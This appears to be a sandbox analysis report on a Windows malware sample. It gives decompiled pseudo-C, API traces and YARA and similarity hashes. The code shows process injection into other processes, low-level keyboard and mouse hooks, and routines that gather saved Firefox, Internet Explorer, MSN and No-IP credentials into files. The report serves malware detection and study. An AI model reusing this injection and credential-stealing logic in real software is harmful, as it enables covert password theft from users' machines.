                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    • Opcode ID: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction ID: 1ef0f6496c909ed0c3779ef052ced8ab034a7c85da5a6e5c6a5d2eb73cd655db
                                    • Opcode Fuzzy Hash: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction Fuzzy Hash: 79B114B4B402086BD710EBE5CC42F9E77A9EB48704F50847BB600BB2D5D778E906979D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004040F4, Relevance: 6.1, APIs: 4, Instructions: 100memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _v8;
				intOrPtr _v12;
				char _v13;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				intOrPtr _v36;
				long _v44;
				void* _v48;
				void* _t38;
				void* _t42;
				void* _t49;
				void* _t55;
				void* _t57;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr* _t80;

				_t80 = _t79 + 0xffffffd4;
				_v12 = __edx;
				_v8 = __eax;
				_t64 =  *0x4037bc; // 0x4037c0
				E0040242C( &_v48, _t64);
				_push(_t79);
				_push(0x404205);
				_push( *[fs:eax]);
				 *[fs:eax] = _t80;
				_v13 = 0;
				_push(0);
				_push(_v12);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
				_t76 = 0x10000000;
				do {
					_t76 = _t76 + 0x10000;
					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
					_t57 = _t38;
					if(_t57 != 0) {
						VirtualFree(_t57, 0, 0x8000); // executed
						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
						_t57 = _t55;
					}
				} while (_t57 == 0 && _t76 <= 0x30000000);
				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
				_t42 = _v48;
				if(_t42 != 0) {
					_v24 = _t42;
					_v20 = _v36;
					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
					if(_t49 != 0) {
						_v13 = 1;
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E0040420C);
				_t68 =  *0x4037bc; // 0x4037c0
				return E004024F0( &_v48, _t68);
			}
























                                    0x004040f7
                                    0x004040fd
                                    0x00404100
                                    0x00404106
                                    0x0040410c
                                    0x00404113
                                    0x00404114
                                    0x00404119
                                    0x0040411c
                                    0x0040411f
                                    0x00404128
                                    0x00404129
                                    0x00404130
                                    0x00404134
                                    0x0040413b
                                    0x0040413d
                                    0x00404142
                                    0x00404142
                                    0x00404159
                                    0x0040415e
                                    0x00404162
                                    0x0040416c
                                    0x00404186
                                    0x0040418b
                                    0x0040418b
                                    0x0040418d
                                    0x004041a5
                                    0x004041aa
                                    0x004041af
                                    0x004041b1
                                    0x004041b7
                                    0x004041c8
                                    0x004041dc
                                    0x004041e3
                                    0x004041e5
                                    0x004041e5
                                    0x004041e3
                                    0x004041eb
                                    0x004041ee
                                    0x004041f1
                                    0x004041f9
                                    0x00404204

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403789, Relevance: 3.1, APIs: 2, Instructions: 85memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
				signed char _t26;
				void* _t32;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t46;
				signed int _t49;
				signed char _t55;
				intOrPtr _t58;
				void* _t60;
				signed char* _t61;
				void* _t65;
				signed int _t66;
				intOrPtr _t67;

				_t61 = __edi;
				_t55 = __edx;
				_t49 = __ecx;
				_t48 = __ebx;
				asm("aaa");
				 *__ecx =  *__ecx + __edx;
				_t26 = __eax + 0x00000001 | 0x00000054;
				_push(__ebx);
				if(_t26 == 0) {
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					E00401CAC(_t65 - 8, __ebx);
					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
					E00401CAC(_t65 - 0xc, __ebx);
					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
					_pop(_t58);
					 *[fs:eax] = _t58;
					_push(E00403871);
					return E00401AE4(_t65 - 0xc, 2);
				} else {
					_t66 =  *(__esi + 0x67) * 0x61727241;
					if(_t66 < 0) {
						 *_t26 =  *_t26 + _t26;
						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
					}
					asm("adc [eax], al");
					_t43 = _t26 - 1;
					 *_t43 =  *_t43 + _t43;
					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
					 *_t49 =  *_t49 + _t55;
					_push(_t66);
					asm("outsb");
					asm("aaa");
					_t45 = _t43 + 2;
					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
					asm("bound ecx, [ecx+0x6e]");
					asm("outsw");
					asm("adc al, 0x0");
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t45 =  *_t45 + _t45;
					 *_t61 = _t55;
					_t46 = _t45 + 1;
					 *_t46 =  *_t46 + _t55;
					 *_t46 =  *_t46 + _t46;
					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
					_t60 = 0;
					do {
						_t60 = _t60 + 1;
					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
					return _t60;
				}
			}
















                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x00403789
                                    0x0040378b
                                    0x0040378d
                                    0x0040378f
                                    0x00403790
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869
                                    0x00403792
                                    0x00403792
                                    0x00403799
                                    0x0040379b
                                    0x0040379d
                                    0x0040379d
                                    0x0040379f
                                    0x004037a2
                                    0x004037a3
                                    0x004037a5
                                    0x004037a9
                                    0x004037ab
                                    0x004037ac
                                    0x004037bd
                                    0x004037be
                                    0x004037bf
                                    0x004037c1
                                    0x004037c5
                                    0x004037c8
                                    0x004037ca
                                    0x004037cc
                                    0x004037ce
                                    0x004037d0
                                    0x004037d2
                                    0x004037d4
                                    0x004037d5
                                    0x004037d7
                                    0x004037d9
                                    0x004037dc
                                    0x004037de
                                    0x004037de
                                    0x004037e4
                                    0x004037eb
                                    0x004037eb

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004037EC, Relevance: 3.1, APIs: 2, Instructions: 51memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				long _v8;
				char _v12;
				char _v16;
				void* _t14;
				void* _t26;
				intOrPtr _t33;
				void* _t38;
				intOrPtr _t41;

				_push(0);
				_push(0);
				_push(0);
				_t26 = __edx;
				_t38 = __eax;
				_push(_t41);
				_push(0x40386a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E00401CAC( &_v12, __edx);
				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
				E00401CAC( &_v16, _t26);
				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E00403871);
				return E00401AE4( &_v16, 2);
			}











                                    0x004037ef
                                    0x004037f1
                                    0x004037f3
                                    0x004037f8
                                    0x004037fa
                                    0x004037fe
                                    0x004037ff
                                    0x00403804
                                    0x00403807
                                    0x00403816
                                    0x00403828
                                    0x00403838
                                    0x0040384a
                                    0x00403851
                                    0x00403854
                                    0x00403857
                                    0x00403869

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00405D04, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				void* _t13;
				intOrPtr _t23;
				void* _t26;

				_v8 = __eax;
				E00401F38(_v8);
				_push(_t26);
				_push(0x405d61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26 + 0xfffffebc;
				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
				if(_t13 != 0xffffffff) {
					FindClose(_t13);
				}
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(E00405D68);
				return E00401AC0( &_v8);
			}








                                    0x00405d0e
                                    0x00405d14
                                    0x00405d1b
                                    0x00405d1c
                                    0x00405d21
                                    0x00405d24
                                    0x00405d39
                                    0x00405d41
                                    0x00405d44
                                    0x00405d49
                                    0x00405d4d
                                    0x00405d50
                                    0x00405d53
                                    0x00405d60

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040387C, Relevance: 3.0, APIs: 2, Instructions: 28memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
				void* _t2;
				void* _t5;
				void* _t9;
				long _t10;
				void* _t11;
				SIZE_T* _t12;

				_push(__ecx);
				_t10 = __ecx;
				_t11 = __edx;
				_t5 = __eax;
				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
				_t9 = _t2;
				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
				return _t9;
			}









                                    0x00403880
                                    0x00403881
                                    0x00403883
                                    0x00403885
                                    0x00403892
                                    0x00403897
                                    0x0040389e
                                    0x004038aa

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BBF4, Relevance: 73.8, APIs: 30, Strings: 12, Instructions: 333sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				void* _t49;
				void* _t52;
				long _t53;
				void* _t55;
				intOrPtr* _t65;
				void* _t68;
				long _t69;
				char* _t80;
				intOrPtr* _t93;
				long _t97;
				intOrPtr* _t100;
				long _t104;
				intOrPtr* _t107;
				long _t111;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t117;
				void* _t120;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t222;
				intOrPtr _t229;
				void* _t254;
				void* _t255;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t270;

				_t255 = __esi;
				_t254 = __edi;
				_t257 = _t258;
				_t213 = 0xb;
				do {
					_push(0);
					_push(0);
					_t213 = _t213 - 1;
				} while (_t213 != 0);
				E00403418(0x40bb04);
				_push(_t257);
				_push(0x40c0c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
				_t209 = _t49;
				if(GetLastError() != 0xb7) {
					CloseHandle(_t209); // executed
				} else {
					CloseHandle(_t209);
					Sleep(0x2ee0);
				}
				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
				_t210 = _t52;
				_t53 = GetLastError();
				_t261 = _t53 - 0xb7;
				if(_t53 != 0xb7) {
					CloseHandle(_t210);
					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
					_t211 = _t55;
					__eflags = GetLastError() - 0xb7;
					if(__eflags != 0) {
						CloseHandle(_t211);
						L26:
						E004013A4(1,  &_v80);
						_t225 = "Restart";
						E00401E94(_v80, "Restart");
						if(__eflags != 0) {
							Sleep(0x3e8); // executed
						}
						E00404604(_t213, __eflags);
						E0040491C();
						E0040B118(_t225, _t254, _t255);
						_t65 =  *0x40d204; // 0x40e8f8
						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed
						_t212 = _t68;
						_t69 = GetLastError();
						__eflags = _t69 - 0xb7;
						if(_t69 != 0xb7) {
							CloseHandle(_t212); // executed
						} else {
							CloseHandle(_t212);
							Sleep(0x3e8);
							_t93 =  *0x40d204; // 0x40e8f8
							_t212 = E00403568(0, 0, E00401F48( *_t93));
							_t97 = GetLastError();
							__eflags = _t97 - 0xb7;
							if(_t97 != 0xb7) {
								CloseHandle(_t212);
							} else {
								CloseHandle(_t212);
								Sleep(0x3e8);
								_t100 =  *0x40d204; // 0x40e8f8
								_t212 = E00403568(0, 0, E00401F48( *_t100));
								_t104 = GetLastError();
								__eflags = _t104 - 0xb7;
								if(_t104 != 0xb7) {
									CloseHandle(_t212);
								} else {
									CloseHandle(_t212);
									Sleep(0x3e8);
									_t107 =  *0x40d204; // 0x40e8f8
									_t212 = E00403568(0, 0, E00401F48( *_t107));
									_t111 = GetLastError();
									__eflags = _t111 - 0xb7;
									if(_t111 != 0xb7) {
										CloseHandle(_t212);
									} else {
										ExitProcess(0);
									}
								}
							}
						}
						__eflags =  *((char*)( *0x40d1dc)) - 1;
						if( *((char*)( *0x40d1dc)) != 1) {
							__eflags = 0;
							E004013A4(0, 0x40f1e8);
						} else {
							E004013A4(0,  &_v88);
							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
							E00401B14(0x40f1e8, _v84);
						}
						E00406008( &_v92);
						E00401D58( &_v92, "XX--XX--XX.txt");
						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
						_t80 =  *0x40d214; // 0x40e8f4
						__eflags =  *_t80 - 1;
						if(__eflags == 0) {
							E0040B7FC(_t212, _t254, _t255, __eflags);
							Sleep(0x3e8); // executed
						}
						E0040B3C0(_t212, _t213, _t254, _t255); // executed
						L43:
						_pop(_t229);
						 *[fs:eax] = _t229;
						_push(0x40c0cb);
						return E00401AE4( &_v92, 0x12);
					}
					CloseHandle(_t211);
					_t114 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0);
					_t117 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xe, E0040B108, _t117, 0);
					while(1) {
						_t120 = E0040BA84(__eflags);
						__eflags = _t120;
						if(_t120 != 0) {
							break;
						}
						E00405918();
					}
					ExitProcess(0);
					goto L26;
				}
				CloseHandle(_t210);
				E00409AD4( &_v24, _t210, _t255, _t261);
				E00401B14(0x40f1ec, _v24);
				_t262 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v28);
					E00401D58( &_v28, "NOIP.abc");
					_pop(_t222);
					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
				}
				E00409D28( &_v32, _t210, _t254, _t255);
				_t235 = _v32;
				E00401B14(0x40f1ec, _v32);
				_t263 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v36);
					E00401D58( &_v36, "MSN.abc");
					_t235 =  *0x40f1ec;
					_pop(_t221);
					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
				}
				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
				E00401B14(0x40f1ec, _v40);
				_t264 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v44);
					E00401D58( &_v44, "FIREFOX.abc");
					_pop(_t220);
					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
				}
				E00409A84( &_v48);
				E00401B14(0x40f1ec, _v48);
				_t265 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v52);
					E00401D58( &_v52, "IELOGIN.abc");
					_pop(_t219);
					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
				}
				E00409A90( &_v56);
				E00401B14(0x40f1ec, _v56);
				_t266 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v60);
					E00401D58( &_v60, "IEPASS.abc");
					_pop(_t218);
					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
				}
				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
				E00401B14(0x40f1ec, _v64);
				_t267 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v68);
					E00401D58( &_v68, "IEAUTO.abc");
					_pop(_t217);
					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
				}
				E00409AB8( &_v72, _t254, _t255, _t267);
				E00401B14(0x40f1ec, _v72);
				_t268 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v76);
					E00401D58( &_v76, "IEWEB.abc");
					_pop(_t216);
					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
				}
				goto L43;
			}
























































                                    0x0040bbf4
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc60
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
